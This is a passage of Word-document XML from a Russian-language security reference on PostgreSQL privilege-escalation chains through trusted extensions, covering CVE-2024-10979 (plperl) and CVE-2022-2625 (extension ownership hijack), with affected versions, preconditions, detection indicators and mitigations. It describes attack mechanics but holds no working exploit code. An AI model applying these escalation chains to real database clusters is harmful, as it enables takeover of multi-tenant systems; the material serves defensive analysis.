          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- БАГ: переписываются атрибуты (owner, security context), но prosrc остаётся атакующее</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">- Функция теперь принадлежит pg_trgm, owner = tenant_admin (тот, кто сделал CREATE EXTENSION)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Заметка: в chain 2 owner становится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (не superuser, как в чистом 3.13.4). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не даёт сразу superuser-эскалацию</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> через ownership. Но даёт другой эффект: функция теперь часть extension, и если admin/DBA позже делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE INDEX ... USING gin (... gin_trgm_ops)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">другой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> БД с теми же tenant_admin-правами или под superuser-сессией (для admin-задач), функция исполнится с правами вызывающего.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">В практике chain 2 — менее прямой, чем chain 1. Реалистичные использования — атака на shared-схему (где extension создаётся в БД, доступной нескольким ролям) или persistence в БД, которая будет backup-нута и restore-нута на другой instance.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Полная карточка CVE-2022-2625</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13.4</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Список наиболее опасных trusted extensions</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Из contrib PG 14+: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plperl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — критично из-за CVE-2024-10979 (chain 1). До патча — RCE без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pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — exploitable через CVE-2022-2625 (chain 2). Function-based indexes с opclass.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hstore</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — exploitable через CVE-2022-2625; функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">hstore_to_array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и др.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citext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — exploitable через CVE-2022-2625; case-insensitive text operators могут быть hijacked.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btree_gin / btree_gist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — opclass-функции могут стать целью CVE-2022-2625; меньше public exploits, но pattern тот же.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plpython3u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plperlu</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plsh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">plr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не trusted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, требуют superuser. Не входят в R28-chain.</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Эскалация от tenant-admin или application-роли с CREATE-on-DB к superuser (chain 1) или к контролю extension-функций (chain 2). Финальный финал — векторы 3.7 (COPY PROGRAM, untrusted PL) или horizontal-move (через другие БД на том же кластере).</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Trusted-флаг в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_extension.control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> был добавлен в PG 13 как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">удобство для multi-tenant SaaS-платформ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: позволить customer-ам ставить безопасные extensions без обращения к DBA. Sandbox каждого trusted extension валидировался </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">изолированно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: plperl trusted считался безопасным, потому что Safe.pm блокирует OS-вызовы; pg_trgm считался безопасным, потому что это просто индексные функции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Что не было учтено — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">chain с другими CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: trusted-флаг расширяет attack surface для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уязвимостей, которые могут появиться в этих extensions в будущем</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. CVE-2024-10979 — реализация этого риска: trusted plperl, который считался безопасным с 2010-х годов, оказался эксплуатируемым из non-superuser-роли.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Эта модель угроз — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">structural</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: каждое новое trusted-extension добавляет в attack surface один потенциальный CVE на ближайшие 10-15 лет жизни extension. PG-сообщество это признаёт (см. R28 open question 8: точный список trusted для PG 14-17 не зафиксирован, что usually индикатор недо-приоритизации управления списком).</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 13.0 (январь 2021) для возможности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non-superuser-ом. До PG 13 все extensions требовали superuser, R28-chain невозможен.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БД (для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chain 2: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в схеме, где extension создаёт функции (типично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Superuser не требуется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жертвы chain 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin/DBA, который позже использует «overridden» extension-функцию в другой БД или под другой ролью.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список trusted extensions конкретного кластера определяется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM pg_available_extensions WHERE trusted = true;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Перечень меняется между PG-версиями.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нет специальных требований.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Pre-conditions для chain 1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG до фикса CVE-2024-10979 (≤ 17.0 / 16.4 / 15.8 / 14.13 / 13.16 / 12.20) + доставка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 3.7.2b).</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Pre-conditions для chain 2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG до фикса CVE-2022-2625 (≤ 14.4 / 13.7 / 12.11 / 11.16 / 10.21) + знание signature функции из extension script.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-блок.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> R28 не имеет единого CVE — это класс цепочек. Связанные CVE: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Используется в chain</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Карточка</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chain 1 (plperl ENV-mutation)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CVE-2022-2625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chain 2 (extension scripts ownership)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3.13.4</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от tenant-admin для trusted-расширений — стандартный self-service паттерн в SaaS-платформах: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Supabase — non-superuser-роль </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">authenticator</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> имеет CREATE на собственной БД, может ставить pg_trgm/citext/hstore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Crunchy Bridge, Aiven — аналогично, customer имеет owner-роль с CREATE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multi-tenant on-prem deployments — каждый tenant_admin администрирует свою БД</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ddl_command_end</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CREATE EXTENSION plperl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от роли, у которой обычно нет потребности в Perl (например, web-app роль, не DBA-роль).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chain 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_proc.prosrc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> функций в </w:t>
      </w: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после CREATE EXTENSION plperl содержит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На версиях PG до фикса 2024-10979 это критический индикатор.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chain 2: pre-existing функция в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(или другой схеме), сигнатура которой совпадает с signature из ожидаемого CREATE EXTENSION install-script — пример уже описан в 3.13.4.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На версиях PG ≥ 13.0 + до фиксов CVE-2024-10979 / CVE-2022-2625 — установка любого trusted extension от не-DBA роли стоит ревьюить.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Версии.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trusted extensions:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> доступны с PG 13.0 (январь 2021). До PG 13 — все extensions требовали superuser, R28-chain невозможен.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chain 1 закрыт:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG ≥ 17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21 (фикс CVE-2024-10979,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chain 2 закрыт:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG ≥ 14.5 / 13.8 / 12.12 / 11.17 / 10.22 (фикс CVE-2022-2625, 11.08.2022).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На версиях PG ≥ 14.5 + ≥ 17.1 (или соответствующих веток) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">оба chain заблокированы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но trusted-extensions сами по себе остаются — это окно для будущих аналогичных CVE.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3.7.2b CVE-2024-10979</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — финальная стадия chain 1. Содержит pre-condition / trigger / post-exploitation детали.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 CVE-2022-2625</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — финальная стадия chain 2. Содержит механику pre-create и ownership-takeover.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общий принцип защиты от подобных hijack-сценариев.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 3.7.2a / 3.7.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — куда уходят финальные RCE-векторы после успешной эскалации.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5.4 (Mitigations: расширения)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — рекомендации по управлению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privilege, audit-логированию extensions, ограничению trusted-set в production.</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«CREATE EXTENSION» (раздел Trusted Extensions) — https://www.postgresql.org/docs/current/sql-createextension.html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«Packaging Related Objects into an Extension» (control-файл, trusted флаг) — https://www.postgresql.org/docs/current/extend-extensions.html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Severalnines: «Overview of trusted extensions in PostgreSQL 13» — https://severalnines.com/blog/overview-trusted-extensions-postgresql-13/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dbi-services: «PostgreSQL 13 trusted extensions» — https://www.dbi-services.com/blog/postgresql-13-trusted-extensions/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pgPedia: trusted extension — https://pgpedia.info/t/trusted-extension.html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CVE-2024-10979 (chain 1) — https://www.postgresql.org/support/security/CVE-2024-10979/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CVE-2022-2625 (chain 2) — https://www.postgresql.org/support/security/CVE-2022-2625/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R28 (sources/research.md, строки 414–431; open question 8 на строке 564)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
